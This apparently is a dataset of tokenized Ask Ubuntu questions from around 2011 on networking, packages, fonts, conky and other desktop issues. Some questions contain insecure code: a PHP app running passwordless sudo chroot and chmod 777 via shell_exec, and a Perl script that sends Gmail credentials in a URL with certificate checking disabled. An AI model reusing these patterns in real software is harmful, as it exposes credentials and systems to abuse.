23568	where does the samba workgroup come from when samba is not running ?	using findsmb on my home network gives me this : ip addr netbios name workgroup/os/version -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 192.168.1.3 mini [ mshome ] [ unix ] [ samba 3.0.25b-apple ] 192.168.1.9 server + [ mshome ] 192.168.1.11 nas [ workgroup ] mini - a mac mini server - ubuntu 10.10 server ; samba installed but not running . nas - another ubuntu 10.10 server ; samba installed but not running . when samba is running the ubuntu groups are the values from /etc/samba/smb.conf , but with samba turned off it falls back to these defaults - even different defaults for two installations of the same os . i would like to change the workgroups , but i ca n't figure out where the value is coming from : not from samba ( that 's a different value ) , not from winbind ( not running ) , not from avahi ( not installed ) ; and i do n't know of anything else involved in network groups . how can i find this setting so i can change it ?
23569	why is my network disconnecting when i use scp or rsync ?	i have a wired network connection from my ubuntu ( 10.10 ) pc ( call it pc-a ) to a netgear mr314 router and from there to a thompson tg585v7 adsl modem . the only devices connected ( by ethernet cable ) to the netgear router are a network printer and the pc in question ( pc-a ) . connected ( by ethernet cable ) to the thompson adsl modem are two pcs ( one ubuntu 10.10 - call it pc-b , one with openfsg- call it pc-c ) and the netgear router as well as some part-time devices on the wireless connection . so , ignoring wireless , it looks something like this : the world via adsl ! | | pc-c -- -- -- modem -- -- -- - pc-b | | | printer -- - netgear router -- - pc-a this seems to work without any problems under normal operation . however , if i try to upload large files from the problem pc ( pc-a ) to either pc-b or pc-c , the data is transferred for a while , but after around 5 minutes the network connection disconnects briefly . this also sometimes ( but less consistently ) happens if the transfer is going in the other direction . i 've tried the transfers with scp , rsync-over-ssh and plain rsync . all suffer the same problem . i can tell this has happened as a notification window appears at the top of the screen saying `` wired network . disconnected : you are now offline '' and a few seconds later a notification window appears saying `` auto eth0 . connection established '' and the network works again . unfortunately , this results in the transfer stalling and not necessarily being recoverable ( depending on the type of transfer ) . i can consistently transfer files by scp or rsync between pc-c and pc-b ( in either direction ) without any problems at all and i 've never noticed having problems downloading large files from the web onto pc-a . in a quick test i just performed , i opened a terminal on pc-a and tried to scp a 700mb file from pc-b to pc-a and the connection dropped after 200mb . i then opened google chrome and downloaded a 693mb file from the web and the connection did n't drop at all . when the connection drops , /var/log/messages shows this : jan 27 19:37:58 morat kernel : [ 4065.023469 ] e1000e : eth0 nic link is down jan 27 19:38:07 morat kernel : [ 4074.083848 ] e1000e : eth0 nic link is up 100 mbps full duplex , flow control : rx jan 27 19:38:07 morat kernel : [ 4074.083852 ] e1000e 0000:00:19.0 : eth0 : 10/100 speed : disabling tso the time between `` nic link is down '' and `` nic link is up '' seems to be consistently 9 seconds . i 'm thoroughly confused . i probably have n't provided enough information to get to the bottom of this , so if there 's anything else that would be useful , please say in the comments or wherever and i 'll add whatever detail i can . thanks in advance for any help you can offer .
23570	how can i hide the text under the desktop icons ?	i want to display the desktop icons without the text . i only have the home and trash icons on the desktop . any sugestions ?
23574	how do i run g++-4.5 ?	i 've installed g++-4.5 via apt , and there exists a /usr/bin/g++-4.5 . however , when i try and run g++-4.5 , i get this error message : /usr/bin/g++-4.5 : not found ( hardened-c++ could not find target ) in fact , the file /usr/bin/g++-4.5 seems to be a perl script . i understand that ubuntu uses hardening wrappers around gcc , but i do n't know how to actually compile something using g++ in this state . how can i fix this ?
23577	is troubleshooting apparmor with 'teardown ' unsafe ?	i understand there is a safer , more targeted way to troubleshoot apparmor 's possible contribution to an issue than completely stopping the service and tearing down apparmor profiles . can someone give me the details , and the advantages of the better approach ?
23578	how do i pin a particular mysql version to avoid unnecessary upgrades ?	i 'm running a mysql server , and want to keep it up to date with regular apt-upgrades . i do n't want this to cause mysql to upgrade unless i 'm doing it during scheduled downtime ! how do i alter my apt-preferences so that this wo n't happen ? i 've tried adding this to a file as /etc/apt/preferences.d/pin-mysql package : mysql-client-5.1 pin : version 5.1.41-3ubuntu12.7 pin-priority : 1001 package : mysql-client-core-5.1 pin : version 5.1.41-3ubuntu12.7 pin-priority : 1001 package : mysql-common pin : version 5.1.41-3ubuntu12.7 pin-priority : 1001 package : mysql-server pin : version 5.1.41-3ubuntu12.7 pin-priority : 1001 package : mysql-server-5.1 pin : version 5.1.41-3ubuntu12.7 pin-priority : 1001 package : mysql-server-core-5.1 pin : version 5.1.41-3ubuntu12.7 pin-priority : 1001 that then states the packages are pinned with `` apt-cache policy '' outputting : ... all package sources here 500 http : //security.ubuntu.com/ubuntu/ lucid-security/universe packages release v=10.04 , o=ubuntu , a=lucid-security , n=lucid , l=ubuntu , c=universe origin security.ubuntu.com 500 http : //security.ubuntu.com/ubuntu/ lucid-security/restricted packages release v=10.04 , o=ubuntu , a=lucid-security , n=lucid , l=ubuntu , c=restricted origin security.ubuntu.com ... etc pinned packages : mysql-server - > 5.1.41-3ubuntu12.7 mysql-server-core-5.1 - > 5.1.41-3ubuntu12.7 mysql-client-core-5.1 - > 5.1.41-3ubuntu12.7 mysql-common - > 5.1.41-3ubuntu12.7 mysql-server-5.1 - > 5.1.41-3ubuntu12.7 mysql-client-5.1 - > 5.1.41-3ubuntu12.7 however ... running aptitude safe-upgrade just updated mysql ... what am i doing wrong ?
23581	refreshing the wireless network list ?	when i wake up my laptop ( ubuntu 10.04 ) from suspension , it does not recognize the available wireless networks . the only way to refresh the list is to disable wireless networking , and than enable it . any idea how to force a refresh on the list of wireless networks ?
23586	display workspace 's number ?	is there a way to somehow display the number ( or identifier ) of the current workspace in ubuntu 10.10 ?
23590	missing dropbox indicator-applet icon , how do i get it back ?	i 'm currently running ubuntu 10.10 64-bit and wanted to change my dropbox indicator-applet icon to make it look more uniform with the other icons . i found this suggestion of a ppa and package to try and followed these instructions : how can i change dropbox 's indicator applet icon ? this worked fine , however , after deciding that i did n't like those icons i uninstalled them via a sudo apt-get autoremove monochrome-icons-extra then did a ppa-purge on that ppa . i then stopped and started dropbox and at that point was missing an icon all together . i can click in the empty space where the dropbox icon should be and get the drop-down menu , so i know dropbox is running . i also confirmed this buy running dropbox status and it returned idle . i tried rebooting but that did n't make a difference , the icon still wont show up . next i tried reinstalling dropbox via sudo apt-get -- reinstall install nautilus-dropbox , that had no effect . i then tried to completely remove everything and reinstall . to accomplish this i did the following : sudo apt-get -- purge autoremove nautilus-dropbox rm ~/.dropbox ~/.dropbox-dist ~/.dropbox-dist-new sudo rm /etc/apt/sources.list.d/dropbox* i then went to dropbox.com and downloaded the latest .deb and installed it that way and the icon was still missing , argh ! through a little research , i discovered that the ppa installed the icons to to /usr/share/icons/ubuntu-mono-dark/status/22/dropboxstatus-*.svg and that 's how it changed the icons . the images are n't there any more ( having uninstalled the ppa ) , but when i checked on my laptop where dropbox is working fine , there are n't any other icons in that location , either . what is going on and how do i fix this ?
23593	use webcam to sense lighting condition and adjust screen brightness	is there a way to have my webcam sense lighting conditions and adjust screen brightness accordingly ?
23596	what 's the equivalent to 'explorer . ' ( windows ) or 'open . ' ( mac ) ?	inside the terminal , i could use the command 'explorer . ' in win32 or 'open . ' in mac to open gui explorer/finder . what 's the equivalent command in ubuntu ?
23598	what does `` waiting time 0 '' mean ?	i 'm trying to run a game through wine . although , the game -albeit sometimes very slow- works until its status becomes `` waiting time 0 '' in system monitor 's `` waiting channel '' column , then if i am lucky i am able to end the process if not i had to reset the machine ... what does `` waiting time 0 '' do ? do i have any chance to prevent this application to get this status ?
23602	how can i change the terminal prompt to something simple ?	when i open a terminal it shows something like dave @ daves : ~ $ or dave @ daves : ~/desktop $ . i do n't want the dave @ daves to show up . can this be modified to show only the time or something simple like a dos prompt ?
23603	how to change font size in emacs ?	i download emacs with 'sudo apt-get install emacs ' . when i run emacs , i see emacs with too big fonts . i do n't know why the default setup to have normal font size in emacs . how can i do that ?
23607	recommendations for stock trading and investment applications ?	i am looking for a good in-depth stocks or investment application . i have tried grism but it is lacking . there are others ive found like jstock which uses java , eclipse trader which is not user friendly . stock market eye looks interesting , but it is pricey . can anyone recommend anything else out there ? thanks !
23609	is there a spiceworks equivalent ?	for some reason i vaguely recall there being an equivalent of spiceworks for ubuntu . i had it running on an old server that crashed and now i ca n't remember the name . any thoughts ?
23610	how to enable unicode support in a tty ?	when i open a tty ( ctrl + alt + f1 ) it does n't have utf-8 support . how can i enable it ?
23611	network manager applet menu freezes and does not respond	since the latest update in ubuntu 10.10 , the nm-applet has started doing some strange things . i boot up the pc , all is fine , internet works , etc ... but after a period of time , approx and hour , the nm-applet menu in the gnome panel fails to respond . when i click on the icon , the menu appears , all looks well , but when i select any option , eg disconnect , nothing happens . even the vpn sub menu disappears ( no triangle to select the menu . ) however i do not lose the network connection ... if i run this script : killall nm-applet /etc/init.d/networkmanager restart nm-applet all returns as normal , for a while ... weird ? i tried uninstall/reinstall ... i even reinstalled ubuntu , but once the latest updates are applied this issues arises ... any help ?
23615	is there a way to open a terminal from xdg-open or nautilus ?	i asked and was answered at this post about opening a gui explorer from a command line . how about the other way around ? i mean , is there a way to open a terminal from xdg-open or nautilus ?
23616	sound does not work once my profile loads	when i boot up my ubuntu 9.10 distro , the sound works just fine , but hen i sign into one of my profiles , the screen flickers for a second , and then the sound card no longer works . it appears that my profile is trying to reload my sound card and is confusing it . i have been unable to find out when it is loading the second instance though . any help would be greatly appreciated .
23619	failed command : write dma	when i boot up my computer , it takes a long time and has a `` failed command : write dma '' error with other lines that looks like the command line , can anyone help me ? i replaced the 40 pin cable from my old hard drive with an 80 pin cable and it did n't fix it . thanks .
23620	where are chrome preferences stored ? ( to force chrome uniformity in fonts )	i want to force chrome fonts to be consistent on every site i visit . the chrome preferences do n't affect this at all . i found this link which states which webkit settings to edit to accomplish this , but where are the preferences stored on linux ?
23622	how do i get poulsbo ( gma500 ) drivers to work ?	i 'm trying to get working the poulbo driver under ubuntu 9.10 . i 've installed poulsbo-driver-2d poulsbo-driver-3d poulsbo-config packages from sudo add-apt-repository ppa : gma500/ppa . the packages installation is working . after i have to put in xorg.conf driver `` psb '' . then i reboot and i have no more display . i have to switch back to vesa in order to display back . can someone give me some kind of solution ?
23624	does n't start up properly after upgrade	i can not enter my desktop after an update last night . i realize that they was add another release version ( lines ) in the grub . how can i fix the problem ? should i run update again using recovery mode ? if so , how ?
23630	how do you share history between terminals in zsh ?	how can it be achieved so that every command that is entered , is visible in every open terminal 's history ? when having multiple terminals open , the history is n't shared , i.e . what you entered in one terminals history , does n't show up in another one . think of an alternative to bash 's prompt_command= '' history -a '' ( which saves the history before the prompt is beeing displayed ) .
23634	selecting tables in pdf	on adobe acrobat on windows there is a `` select table '' tool that allows me to select tables to cut and paste into word . i would like to cut and paste tables from pdfs into opennoffice on ubuntu now , but there is not similar tool . is there a way to make evince do this , or another program that does have this tool ? i also looked at pdfedit and xpdf , but no success .
23636	what activities stop computer from sleeping	i generally set up power hungry servers with a fairly short timeout before they 're supposed to suspend or hibernate , but they seem to occasionally go to sleep during file transfers , ssh sessions , etc . what sort of activities are considered `` activity '' of the sort that will keep the machine awake ?
23637	linux kernel wo n't update to 2.35.25	my recent linux kernel version is 2.35.24 . yesterday , there was an update which is 2.35.25 but after the update , my kernel version is still stuck at 2.35.24 . is there any option to get it to 2.35.25 ?
23642	is this a kernel panic ?	what 's the meaning of all that mess ?
23643	how do i disable the `` fn '' keys on a laptop ?	i was wondering if anyone could tell me how to disable the fn key on my laptop ?
23644	why is there no 64-bit release of the netbook edition ?	why is there not a 64-bit version of ubuntu netbook edition around ? now that there are 64-bit atoms around , i think it would make sense ( more cpu registers etc ) .. ( ? )
23645	how do i download the command-line emacs instead of the gui one ?	i used sudo apt-get install emacs to download emacs . i expected the command-line emacs to start when i ran emacs but instead the gui emacs started . how can i download the command-line emacs ?
23650	do i need to install a bootloader while upgrading a virtual machine ?	i have a virtualization server which is having a few virtual machines running at top of it . all this was done using ubuntu server edition with kvm and using virt-manager on ssh connection . these vms are lucid 10.04 64 bit vms . when i upgrade them via apt-get upgrade on an ssh connection in between the ncurses screen , it asks me if it should install a bootloader and to select yes or no for it . i have no clue what should i select here and i cancel the upgrade.since it is a production machine i can not specify any thing like this . so let me know what will be a correct .
23651	ipod nano 6th generation support	is it possible for ubuntu 10.10 ( or any of its applications ) to support ipod nano , 6th generation ?
23656	format password protected usb flash on ubuntu	my flash disk is password protected . when i plugged it into my ubuntu machine i did n't see the flash disk appear , but when i plugged it into windows i can see the drive but ca n't open the drive . it gives me the option to `` format '' but when i click on `` format '' it says `` password protected '' . is there a way to format my drive and back to the original ?
23657	building a .deb file , install dependencies too	i am part of a small team that develop an intranet web app . we want to a method of easy installation , so we were thinking about how apt-get works , especially with installing dependencies . our app has many dependencies ( php5 , postgresql , fop etc ) but we need control over who has access to the installation . with this in mind we started looking at building our own .deb file . it looks like i can define the dependencies in my control file but when we try to install the .deb file using dpkg , the dependencies are checked , fail and the installation stops . what i did then was to run a apt-get -f install command to run the installation again with dependencies , but i do n't want to do this . so here 's the question , is there a way that a .deb file can install the dependencies automatically , just like and apt-get install abc would ? basically we want to make the installation as simple as possible , therefore we do n't want the end user to be running any command that is n't absolutely necessary .
23661	chinese font with no smoothing got set as default after installing chinese languge support ( how to disable it ? )	before : after : i suspect this is the undesired font : edit : i think is this font : ar pl uming tw . is there a way of removing it or giving preference to another chinese font ?
23665	how can i get my deb file into the repositories ?	how can i publish my open-source project in open ubuntu repositories ? i have already compiled a deb which i can install on all my ubuntu 's but i would like to publish it into the ubuntu repositories to permit persons to install over apt-get install and also to get updates automatically .
23666	'apt-get ' does not work with proxy	for the command sudo apt-get update i get following error : w : failed to fetch http : //ch.archive.ubuntu.com/ubuntu/dists/maverick-updates/multiverse/binary-i386/packages.gz 407 proxy authentication required ( the isa server requires authorization to fulfill the request . access to the web proxy filter is denied. ) i am running ubuntu 10.10 installed on windows xp using virtualbox . for internet connections i am using proxy server with an authentication . i tried to use gnome-network-proxy tool to set proxy settings system-wide . after that /etc/environment has been updated by http_proxy variable with the format http : //my_proxy : port/ , there were no authentication data . i checked this with firefox . browser asked my for login and password and everything was working fine . it was unfortunately not the case for apt-get . i have also tried to do as described here . unfortunately it does not work . may it be somehow related to the fact that a proxy is in a windows domain , any ideas ? my proxy name is http-proxy . is '- ' a special character here ?
23670	how to make conky text semitransparent ?	okay , before you ask me to rtfm , i 'll show you a screenshot , and describe my situation : screenshot this is what i want to get . the screenshot above shows ( semitransparent ) conky , but the transparency is provided by adding an opacity filter for conky in ccsm . needless to say , that only works when the window is controlled by the wm , ie . when conky is in normal mode ( and not desktop or override ) . this is kinda okay , but if you click the `` show/hide all windows '' button , conky gets hidden as well ( which ideally , should not happen . conky configuration file alignment top_right background yes use_xft yes xftalpha 0.1 border_margin 5 border_width 5 default_color white # grey 5f5f5f 3f3f3f double_buffer yes draw_borders no draw_outline no draw_shades no gap_x 30 gap_y 60 maximum_width 240 minimum_size 175 no_buffers yes override_utf8_locale yes own_window yes own_window_title conky own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager own_window_transparent yes own_window_type override # # normal /override /desktop text_buffer_size 200 total_run_times 0 update_interval 1 uppercase no xftfont ubuntu beta : size=8 # fonts # blue highway # zegoe light - u # zekton # calibri # engebrechtre # opeln2001 # aller display text $ { font aller : pixelsize=55 } $ { alignc } $ { time % h : % m } $ { font } $ { font aller : pixelsize=11 } $ { alignc } $ { time % b % d , % y } $ { alignc } $ { time % a } $ { font } # $ { voffset 10 } $ { alignc } $ { font stylebats : size=8 } a $ { font } cpu1 : $ { cpubar cpu1 9,80 } # $ { alignc } $ { font stylebats : size=8 } a $ { font } cpu2 : $ { cpubar cpu2 9,80 } # $ { alignc } $ { font stylebats : size=8 } g $ { font } ram : $ { offset 1 } $ { membar 9 , 80 } # $ { font webdings : size=10 } ~ $ $ { battery_bar } ... and more i 've used every possible combination of argb settings and stuff , but nothing works . i really want it to be : semitransparent '' sticky '' , so that it is n't minimized when you use c-d or `` hide all windows ''
23674	netbook freezes with high load on every io operation	i have acer eee pc with ssd drives and ubuntu 10.10 . it works fine - most of the time - but after boot or io-intense operation ( copying file , installing updates , etc ... ) load increases to 2 , stays for a few minutes and slowly decreases back to 0.5 or so . how i can confirm source of the problem ? is it ssd drives , software , drivers , something else ? any way to fix ?
23676	change swap memory size after adding ram ?	i ordered some addon ram a few days ago to install on my ubuntu 10.10 stationary computer and while giving it some thought , i remember that i previously did change the swap memory file size on a xp computer after doing a ram upgrade in the past . should i change the swap memory size ( increase ? ) after installing more ram into my computer ?
23679	file permissions on files copied from usb do not match file permissions of files i create in ubuntu	when i create a file in ubuntu , it creates with only read/write permissions for the owner . but if i copy a file from a fat32 usb drive , the file permissions give read/executable powers to owner , group and others . how do i make files copied from a usb drive adopt the same file permissions as other files in ubuntu ?
23680	problems with certificate with wget and github lately	lately , i have received errors while using wget against github on ubuntu 10.04 . error : certificate common name `*.github.com ' does n't match requested host name `github.com ' . to connect to github.com insecurely , use ` -- no-check-certificate ' . does anyone know why this error ocours and how to fix it ( without -- no-check-certificate ) .
23683	ubuntu chroot âno such file or directoryâ	i have a web application where i create some folders on my server and put executables there . then i try to run them with chroot but i get a message that access is denied there . i tried chmod -r 777 blah blah ... . and then i get a message that the folder or the file that i call ( sudo chroot mydirectory myfile_inside_mydirectory ) does not exist . this happens only when i call chroot on folders created by the web server . my web application is in php and i use : shell_exec ( `` cp -r /var/www/comp/prison/bin $ dir '' ) ; shell_exec ( `` cp -r /var/www/comp/prison/lib $ dir '' ) ; shell_exec ( `` cp /var/www/janitor.out $ dir/janitor.out '' ) ; shell_exec ( `` sudo chmod -r 777 $ dir '' ) ; $ process = proc_open ( `` sudo chroot $ dir janitor.out '' , $ descriptorspec , $ pipes ) ; sudo does not need password .
23685	fonts dpi problem in firefox and open office	i have changed fonts dpi from 96 to 85 . now the desktop really looks great but the problem is that firefox and open office wo n't apply the new settings . they still use 96 dpi . any suggestion ? thx
23688	best way to list 100 first files in a directory sorted by time	what would be the best way to list 100 first files in a directory sorted by the created timestamp ( oldest first ) . the directory is quite large ( around 100000 files ) . ls piped to head takes an awful long time to complete . edit : filesystem is ext3 . limiting the number of files in the folder is not worth the effort , since this is going to be a rare `` clean-up '' operation and files are generated by a 3rd party software . using file modified time , instead of the creation time provides and acceptable solution .
23691	motion eye webcam and micro does n't work	i 'm having problems with my motion eye webcam and my microphone . it doesnt work on ubuntu ... i already tested it with cheese , empathy and pidgin , but ubuntu doesnt recognize it . my system : sony vaio vgn fz21s ram : 2gb graphics : nvidia geforce 8600m gs cpu : intel centrino duo 2.2 ghz harddrive : 320 gb
23692	why is /var/lib/mlocate.db almost 800 mb ?	can i do something about it ? i 'm running out of disk space .
23693	unable to boot either ubuntu or windows after kernel panic	today i have been unable to boot into my ubuntu ( 10.10 ) or windows ( 7 ) partition . ubuntu kernel panics on boot with the error : init : hash.c:296 : assertion failed in nih_hash_search : hash ! = null i can boot into a liveusb environment , and from there can access all my files on my 3 partitions ( 1 ext4 , 2 ntfs ) . i have also ran fsck on the ext4 partition and ntfsfix on the 2 ntfs partitions , both not finding any errors at all . and grub is intact and have also tried a reinstall of it . so at the moment i 'm currently stuck using a liveusb , and would like to see if there are any other options other than reinstalling . thanks . update i 've now ran chkdsk using my windows recovery disk , and it found errors and fixed them , but i am still unable to boot into either windows or ubuntu update # 2 i 've decided to just re-install ubuntu and start again as i did n't really want to spend any more time looking around whilst i need this computer for work . thanks for all your help though .
23695	guide for installing open source software	i am using the ubuntu 10.04 os . for my work i have had to install many open source numerical software on my laptop . going about `` compiling '' , `` building '' and `` linking '' libraries , editing .bashrc files , etc during installation phase is giving me nightmares . i know the manuals of the required software is the best place to understand how to install it , but often i come across extremely poor documentation . since i am pretty much a newbie to linux , can anyone suggest some resources/books/websites which give me general guidelines on how to go about doing the above . this would help me understand exactly what goes on during the installation phase . my days of fumbling in the dark would be over . thanks
23710	find out what filesystem a file or directory is part of	i have a lot of filesystems : / on a pci-e ssd swap on a sata ssd /media/ned is a raid5 array /tmp lives on ram parts of /home/oli are symlinked and bind-mounted in from ned i also have /media/jeff/ which is raid1 that i store backups and bind-mount ~/.wine in off . it 's actually a lot more complicated than that . there are all sorts of extra symlinks that i need to untangle in the long run but for now i just need a nice way of taking a path and finding out where it physically lives .
23711	how do i clone my monitor ?	i recently installed ubuntu 10.10 on my dell latitude e6510 and i did n't find how do i do to clone monitors , i can only extend it . is the intel速 hd graphics , it is not the nvidia version . cloning monitors used to be simple .
23714	i want to fix a bug . where do i start ?	although i am not a professional programmer , i have written a program or two . yet , nowadays every engineer and scientist learns to program a bit as well , and as such i am used to writing programs in python , c and matlab . now i want to give back a bit to ubuntu and its great folks and fix a bug ! i had a look at the list of the bitesize campaign and had to find that most of them are not that easy for me to fix as i suspect they require a lot of time to get into the matter , and i do not have that . still i discovered this one and it looks manageable and like a cool feature to me . as i have never written a patch or released a program to the wild before though , i have no idea where to start . what should be my first step to tackle that problem ? bottom line : where and how do i start fixing that guy ?
23715	ubuntu one syncs only the ubuntu one folder . where is my purchased music ?	on my maverick laptop i have synced some folders like pictures and documents . also i have some purchased music . with natty narwhal ubuntu one just syncs the ubuntu one folder . what 's wrong ?
23721	square in calendar on random day	i 'm running unity on ubuntu 10.10 netbook edition here . in this screenshot , there is this small orange square on the calendar which i presume is supposed to mark the present day of month . still , it seems to highlight a random date , which can be set by any user . it is worse : even if i set it to the current day of month , it does n't get updated when the clock hits 12am . so , i would like it to highlight the current day , update itself automatically , and keep normal users from changing it . is it possible ? thanks a lot ! !
23724	are ratings & reviews going to be in maverick ?	ratings & reviews hit natty yesterday , and i can confirm they 're working pretty well . the process is pretty much painless , the interface is straightforward and even server-side , it looks like its working pretty well . my question is , are we going to see ratings & reviews cherrypicked from natty and backported to maverick 's software center ?
23726	nautilus can not display ftp files , filezilla and comman-line 'ftp ' can	does anyone know why nautilus would allow me to login to a server but not display any files , but when i log in via the 'ftp ' command-line binary , it works and allows me to display all the files , make directories , etc. ? i was able to login and see/edit files via filezilla too . here 's part of the log : code : response : 220 microsoft ftp service command : user -- -- response : 331 password required for -- -- . command : pass *********** response : 230-welcome to the alentus ftp server . response : 230 user -- -- logged in . command : syst response : 215 windows_nt command : feat response : 211-feat response : size response : mdtm response : 211 end status : connected status : retrieving directory listing ... something to do with gio/gvfs ? ubuntu 10.10 nautilus 2.32.0 filezilla 3.3.3 ftp 0.17-23
23731	mimic command key as control key in vmware	i use ubuntu 10 with vmware fusion for mac os x. mac uses command for what mac/pc uses control key . can i make the command sends the control command in vmware or get the same effect in ubuntu ?
23734	drive reporting incorrect free space	so i swapped my shiny sata ssd for an even shinier pci-e ssd . i run my core os on the ssd because it 's silly-fast . i did this on my old ssd so i created a new ext4 partition and then just dded the data across ( sorry i do n't know the exact command i ran anymore ) and after reinstalling grub , i booted onto the pci-e ssd . at first glance everything had worked perfectly and things were running faster than ever . but then i noticed the free disk space on the new , larger drive : it was almost exactly the same as it was on the other disk ... a disk that was half its size . so it looks as if i 've copied the files across incorrectly and it 's copied some of the filesystem metadata along with it . tools like du and disk usage analyzer come back with the correct figures . things that look at the partition ( and not the files ) seem to think the drive is 120gb i 've been using this drive for a week now so it 's way out of sync with the old ssd so dumping the data and starting again is n't a job that fills me with joy but two questions : is there a way to fix my filesystem so it knows what it 's really on about ? fsck e2fsck and badblocks all seem to be able to scan it without finding a problem with it . if i do plug my old ssd back in , copy the data off my pci-e on to it and then copy it back onto a fresh filesystem ( eg juggle the data around ) , what 's the best way of doing that ? i obviously want to keep all the permissions and softlinks where they are .
23735	how to convert vcd to dvd ?	i have lots of vcds which i want to convert to dvds . can you suggest me a software with gui which would do it for me ? thanks .
23741	how to reach a host in the same network by hostname ?	i have a network which connects a couple of hosts . i would like to be able to reach other hosts from one of them using the hostname . i just discovered the `` .local '' domain , which is available through avahi and /etc/nsswitch.conf . but it 's not set up this way on my servers . and i do n't want to create an entry in my dns server . is there an other way to do so ?
23745	how to compute pid cpu load ?	please help me to find a reliable way to compute ( in a bash script ) a jboss pid cpu load . to be specific , i do n't know how to aggregate /proc/ [ pid ] /stat fields to obtain the load a specific process makes on a multiple cpu 64 bit env . ubuntu . thanks a lot , xander
23748	no image when booting into either recovery mode or normal gnome session	i have an nvidia geforce 295 gtx , and it works great in windows . however , when booting into ubuntu i had intermittent problems for a while where the system theme went haywire , it looked like `` windows classic '' with gray windows et cetera . then they stopped being intermittent , and i always had these boring gray windows . i tried finding a workaround uninstalling the nvidia drivers and downloading newer ones from nvidias site . i uninstalled them but could n't shut down the xserver to command line . if i did /etc/init.d/gdm stop the system just hanged . i tried booting into recovery mode , but after a whole bunch of startup output my screen goes to sleep ( eg no output ) . lastly this has escalated so now i do n't get any image when i boot into a normal ubuntu session
23750	technical differences between ways in which unix and windows `` mount '' devices	question from which this arose is here : what does it mean to mount something ? since asking about which is `` better '' or which `` worse '' can lead to subjective and argumentative answers , i 'd like to know about the technical differences between the two .
23753	tweak conky layout via a script	i 'm using a script in conky in order to display my new gmail on my desktop . it works beautifully , but is kind of ugly , and i 'm not sure how to fix it . what i 've currently got looks like this : and what i 'd like is this : any ideas for how to make that happen are much appreciated . here 's the script i 'm currently using in its entirety . # ! /usr/bin/perl use switch ; use text : :wrap ; my $ what= $ argv [ 0 ] ; $ user= '' username '' ; # username for gmail account $ pass= '' password '' ; # password for gmail account $ file= '' /tmp/gmail.html '' ; # temporary file to store gmail # wrap format for subject $ text : :wrap : :columns=65 ; # number of columns to wrap subject at $ initial_tab= '' '' ; # tab for first line of subject $ subsequent_tab= '' \t '' ; # tab for wrapped lines $ quote= '' \ '' '' ; # put quotes around subject # limit the number of emails to be displayed $ emails=-1 ; # if -1 display all emails & passwd ; # give password the proper url character encoding switch ( $ what ) { # determine what the user wants case `` n '' { & gmail ; print `` $ new\n '' ; } # print number of new emails case `` s '' { # print $ from and $ subj for new email & gmail ; if ( $ new > 0 ) { my $ size= @ from ; if ( $ emails ! =-1 & & $ size > $ emails ) { $ size= $ emails ; } # limit number of emails displayed for ( my $ i=0 ; $ i $ emails ) { print `` $ emails out of $ size new emails displayed\n '' ; } } } case `` e '' { # print number of new emails , $ from , and $ subj & gmail ; if ( $ new==0 ) { print `` you have no new emails.\n '' ; } else { print `` you have $ new new email ( s ) .\n '' ; my $ size= @ from ; if ( $ emails ! =-1 & & $ size > $ emails ) { $ size= $ emails ; } # limit number of emails displayed for ( my $ i=0 ; $ i $ emails ) { print `` $ emails out of $ size new emails displayed\n '' ; } } } else { print `` usage error : gmail.pl \n '' ; print `` \tn displays number of new emails\n '' ; print `` \ts displays from line and subject line for each new email.\n '' ; print `` \te displays the number of new emails and from line plus \n '' ; print `` \t\tsubject line for each new email.\n '' ; } # did n't give proper option } sub gmail { if ( ! ( -e $ file ) ) { # create file if it does not exists `touch $ file` ; } # get new emails `wget -o - https : // $ user : $ pass\ @ mail.google.com/mail/feed/atom -- no-check-certificate > $ file` ; open ( in , $ file ) ; # open $ file my $ i=0 ; # initialize count $ new=0 ; # initialize new emails to 0 my $ flag=0 ; while ( ) { # cycle through $ file if ( // ) { $ flag=1 ; } elsif ( / ( \d+ ) / ) { $ new= $ 1 ; } # grab number of new emails elsif ( $ flag==1 ) { if ( /.+/ ) { push ( @ subj , & msg ) ; } # grab new email titles elsif ( / ( .+ ) / ) { push ( @ from , $ 1 ) ; $ flag=0 ; } # grab new email from lines } } close ( in ) ; # close $ file } sub passwd { # change to url escape codes in password # url escape codes $ _= $ pass ; s/\ % /\ % 25/g ; s/\ # /\ % 23/g ; s/\ $ /\ % 24/g ; s/\ & /\ % 26/g ; s/\//\ % 2f/g ; s/\ : /\ % 3a/g ; s/\ ; /\ % 3b/g ; s/\/\ % 3e/g ; s/\ ? /\ % 3f/g ; s/\ @ /\ % 40/g ; s/\ [ /\ % 5b/g ; s/\\/\ % 5c/g ; s/\ ] /\ % 5d/g ; s/\^/\ % 5e/g ; s/\`/\ % 60/g ; s/\ { /\ % 7b/g ; s/\|/\ % 7c/g ; s/\ } /\ % 7d/g ; s/\~/\ % 7e/g ; $ pass= $ _ ; } sub msg { # the html coded character set [ iso-8859-1 ] chomp ; s/ ( .+ ) / $ 1/ ; # get just the subject # now replace any special characters s/\ & \ # 33\ ; / ! /g ; # exclamation mark s/\ & \ # 34\ ; / '' /g ; s/\ & quot\ ; / '' /g ; # quotation mark s/\ & \ # 35\ ; / # /g ; # number sign s/\ & \ # 36\ ; /\ $ /g ; # dollar sign s/\ & \ # 37\ ; / % /g ; # percent sign s/\ & \ # 38\ ; / & /g ; s/\ & amp\ ; / & /g ; # ampersand s/\ & \ # 39\ ; /'/g ; # apostrophe s/\ & \ # 40\ ; / ( /g ; # left parenthesis s/\ & \ # 41\ ; / ) /g ; # right parenthesis s/\ & \ # 42\ ; /*/g ; # asterisk s/\ & \ # 43\ ; /+/g ; # plus sign s/\ & \ # 44\ ; / , /g ; # comma s/\ & \ # 45\ ; /-/g ; # hyphen s/\ & \ # 46\ ; /./g ; # period ( fullstop ) s/\ & \ # 47\ ; /\//g ; # solidus ( slash ) s/\ & \ # 58\ ; / : /g ; # colon s/\ & \ # 59\ ; /\ ; /g ; # semi-colon s/\ & \ # 60\ ; //g ; s/\ & gt\ ; / > /g ; # greater than s/\ & \ # 63\ ; /\ ? /g ; # question mark s/\ & \ # 64\ ; /\ @ /g ; # commercial at s/\ & \ # 91\ ; /\ [ /g ; # left square bracket s/\ & \ # 92\ ; /\\/g ; # reverse solidus ( backslash ) s/\ & \ # 93\ ; /\ ] /g ; # right square bracket s/\ & \ # 94\ ; /\^/g ; # caret s/\ & \ # 95\ ; /_/g ; # horizontal bar ( underscore ) s/\ & \ # 96\ ; /\`/g ; # acute accent s/\ & \ # 123\ ; /\ { /g ; # left curly brace s/\ & \ # 124\ ; /|/g ; # vertical bar s/\ & \ # 125\ ; /\ 